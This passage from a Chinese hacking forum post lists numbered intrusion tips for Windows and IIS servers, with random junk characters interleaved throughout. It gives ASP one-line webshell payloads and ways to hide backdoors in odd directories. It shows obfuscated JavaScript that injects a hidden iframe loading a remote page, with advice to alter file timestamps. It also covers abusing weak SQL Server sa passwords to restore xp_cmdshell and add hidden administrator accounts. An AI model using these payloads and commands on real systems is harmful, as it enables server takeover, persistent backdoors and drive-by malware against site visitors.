b).<%Execute(request("go"))%>
% K9 q  P' N7 l0 ~& H4 d9 _c).%><%execute request("go")%><%
! }2 q' @) Z8 @  y, C* Od).<script language=VBScript runat=server>execute request("sb")</Script>* k/ R. i$ E1 b+ l
e).<%25Execute(request("l"))%25>8 ~( j! W0 v$ w8 v1 Q, V0 i
f).<%if request("cmd")<>"" then execute request("pass")%>
& Z( n+ P9 w# v! f! W) `+ H5 w8 X7 \
1 z5 G6 }8 l- s, y52、at "12:17" /interactive cmd- a, M) }7 ~6 _" L9 T
执行后可以用AT命令查看新加的任务* ]  z( g$ U) I( Q0 L
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。! T/ o! u6 Q) R& ]# u! w4 _
- B, W  \. w3 |# ?/ w
53、隐藏ASP后门的两种方法% r9 o3 V( ?( x- e7 R. y. H
1、建立非标准目录:mkdir images..\' D* n3 C- b0 V! Z  S; y
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp9 Q+ y9 X& @3 O5 W
通过web访问ASP木马:http://ip/images../news.asp?action=login9 k- P5 w" E3 C
如何删除非标准目录:rmdir images..\ /s' m! e( x3 `! ~4 z& M7 U$ O, d0 n
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:; z7 O9 _4 j1 d, y6 C; I
mkdir programme.asp
. c' n# o% ]8 d7 G  a5 L& D新建1.txt文件内容:<!--#include file=”12.jpg”-->3 o. h4 _, H5 s7 j
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* l2 [3 G" z! B8 @* L; C5 H7 P) M" Cattrib +H +S programme.asp
  g# q0 y! @' Y3 F通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
3 g6 ?6 g; r! W: D3 d$ [& u* t: ^! X% ~2 J. w
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
' ~* M6 y7 _3 }! s0 Y然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
, X$ V' O; V2 y2 J+ ], ]4 V
2 L  ~" X" e' V55、JS隐蔽挂马
# w/ V; C9 J% Z& X, G1.
' s1 W: v  ~$ u8 v# Mvar tr4c3="<iframe src=ht";
4 f/ `  A  P( v- p+ c0 otr4c3 = tr4c3+"tp:/";* w4 u$ G; o* M4 U" L8 L4 |
tr4c3 = tr4c3+"/ww";- O6 l; \5 P8 M. @: |! t
tr4c3 = tr4c3+"w.tr4";$ \6 M- k& c9 m! b  L# g
tr4c3 = tr4c3+"c3.com/inc/m";
3 F5 G6 u) N4 b8 D9 L; H! ^tr4c3 = tr4c3+"m.htm style="display:none"></i";0 R, h6 o# e" h# L& p
tr4c3 =tr4c3+"frame>'";
4 d' X2 R. y. q/ Cdocument.write(tr4c3);/ o6 W- s7 e3 @- Y( b$ H4 b! x
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
$ H; T7 U2 u% R0 u! r: U; J% _+ d' i, Q8 Y
2.; Z( L" f5 Z: T) P; D4 K7 c
转换进制,然后用EVAL执行。如
; i8 w( p, [. m# h! }5 g  z. \eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");: x0 n+ g' r. I
不过这个有点显眼。
" {" }8 }3 _# U: I/ j6 k0 [3.9 H( G6 t; U% H3 `
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');% X* t0 Y& c5 ~' F( R
最后一点,别忘了把文件的时间也修改下。) B  {1 X- M3 T7 _9 z
9 ?6 k$ |% K) \. g
56.3389终端入侵常用DOS命令8 K+ l/ P" }8 K) v
taskkill taskkill /PID 1248 /t
/ q5 d- ~7 e/ A0 P5 c) K
. K7 K& h# m7 G  gtasklist 查进程
. |$ B" `1 ?3 A7 ]* e, S. o
. A: _0 A% \9 n* @cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
3 g& v- b, |; x; y8 a! h: Diisreset /reboot
3 E1 U6 I" @: dtsshutdn /reboot /delay:1    重起服务器% c: H7 x5 n* s( d" d* X
) U5 [9 [3 j  E3 Z8 M  _
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
3 A. z; G6 H- @3 J5 Y6 q% g
! ?3 l* A- S. H# pquery user 查看当前终端用户在线情况
0 ~; {. r: A% |# a; _- W5 n' }
( }: R0 j. j7 v) F1 U+ ]7 m要显示有关所有会话使用的进程的信息,请键入:query process *
' Y1 I% Z* I. j6 P5 `4 g! m! R1 f# `  r! j' X! f
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2; s* |# r$ T- \# E

( h$ z! _' Y  O* o+ M要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER24 T: w$ I: V, G( V& `8 |

4 a. t; i# h+ U! N2 r要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
2 h8 n7 ~& i8 K" C9 {8 \! v6 n* _/ a  f$ W* f
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
* P" m1 n+ j3 ^+ t9 [: ^' d/ X( J5 F: Q
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
3 @' _3 d/ Q/ r- L3 f: @
7 ~' Y4 _4 M! Z% ]2 }# \4 s* V命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
7 d3 D9 ?) o1 S! [$ @% p5 w
. b: q, m4 _% p! l. t: i命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机( I7 ^$ Y: g, l' @8 k# b
' b, U; y3 ?( W  K" \
56、在地址栏或按Ctrl+O,输入:& x; d$ V1 _8 j$ g$ m4 F
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
/ C; V8 c( L6 Q# ]0 n. d* l8 P3 N4 T; {1 E+ [! k
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
9 `# j: z+ \3 ]3 O: `4 I
4 o0 s# q. f) n- B57、net user的时候,是不能显示加$的用户,但是如果不处理的话,3 v& v6 B, ^, k) G- L
用net localgroup administrators是可以看到管理组下,加了$的用户的。+ G8 V9 u. T: h5 B+ G& ^

4 B; E# m; R3 Y) U, ^58、 sa弱口令相关命令* ^. _0 h0 x$ k9 N* d

, {. w' O. p0 Z. q" Y8 E一.更改sa口令方法:
4 M+ K( v* n' W8 h) C$ R用sql综合利用工具连接后,执行命令:
& q9 N( \, C0 U$ u0 R1 qexec sp_password NULL,'20001001','sa'
+ {  X, t( V& e(提示:慎用!)6 n9 [% S+ _/ F; h7 W
* N4 \* ]" i+ g
二.简单修补sa弱口令.
& r, ~; I$ C  C% v7 k8 Q
  e' W/ i/ N( z/ {9 n6 W" p$ j方法1:查询分离器连接后执行:
: v- a) V" A3 f0 G5 `if exists (select * from, s8 g/ G& q7 r9 E! N
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and7 [) F8 M  A$ @4 G, B
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
  S6 ]' x% [# k. D. S
; [/ A! I) X1 V" w* s) Oexec sp_dropextendedproc N'[dbo].[xp_cmdshell]') D7 B3 q- a- D# r' |# c
) f3 h3 y) c. }2 M
GO7 n- A% v, H- O

0 [9 H- b/ ]8 F7 t然后按F5键命令执行完毕3 a! |; e, F; H0 Z- E

  y. d- H; y6 @8 d$ y7 |& G方法2:查询分离器连接后+ ^2 ^$ O4 i2 M
第一步执行:use master- Y8 a0 S5 K( U3 f
第二步执行:sp_dropextendedproc 'xp_cmdshell'
/ F- o: O/ F/ ]8 c/ a: m! @然后按F5键命令执行完毕
+ O: }  a2 k4 R7 Y3 F' [0 u
/ T. E; ^9 D4 n- `9 s+ M2 S
1 r$ U# G  S1 p1 `. C8 J三.常见情况恢复执行xp_cmdshell.
: a3 j4 R) R9 @- k
) O! F! E7 C& i) I! f  E1 U  S+ |4 i8 I. V0 m' U- B3 ?
1 未能找到存储过程'master..xpcmdshell'.
% r, ?' k! _3 n   恢复方法:查询分离器连接后,
% L  Y1 |- l- w- x# B2 |+ P7 W第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
- Z& Z( @- z1 k$ Y, D; @第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
) |4 E2 S' Q% f然后按F5键命令执行完毕
& O3 V/ B) B$ h( _0 B
( y- q7 a' o$ q# q* v2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
, \; C; T  @0 E9 Z# o1 {9 H* G( ]3 c恢复方法:查询分离器连接后,
+ o! P5 q  L1 O7 o9 I+ ^第一步执行:sp_dropextendedproc "xp_cmdshell"
/ i7 f* @- c3 p1 M第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 h" _. N4 A6 X1 f- A5 B/ u1 }然后按F5键命令执行完毕
5 I6 S2 {( M% ]/ U" M/ w# c( ?& J) U* y
4 D, S: M) O% E! H- L1 @% n3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)% q2 c: A) C: ^4 i! K% K$ [* B
恢复方法:查询分离器连接后,- d( r& g0 U* g5 C# C" O1 q
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'2 w) C. w; D) a2 v  Z
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
/ I4 O) Q" s% G, c/ {- T* b然后按F5键命令执行完毕- F7 H; ^0 ~  C4 m
, g& H  B* S5 p5 ]' w5 \- F
四.终极方法.
6 T' A( g4 F" s. \4 `如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
5 a4 Y  s6 m7 B( T. b% }& T查询分离器连接后,3 X; |/ y4 C' |* A- R8 p
2000servser系统:
; w4 W5 B" d9 Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'7 l. ]4 b: Y5 R4 f/ }/ X7 S

6 n$ o9 Y! X/ ~1 `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'. l- \) Z4 a; K8 J# @% k- E, H! `

: r1 o9 h6 R" ~xp或2003server系统:* |: d) Q* \- p6 h

2 T  f5 J6 y9 h$ P* M3 Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
8 u& C- I3 M- D; P0 d( |; p* t& O) j6 W7 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
/ R* h* @1 J7 e( m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表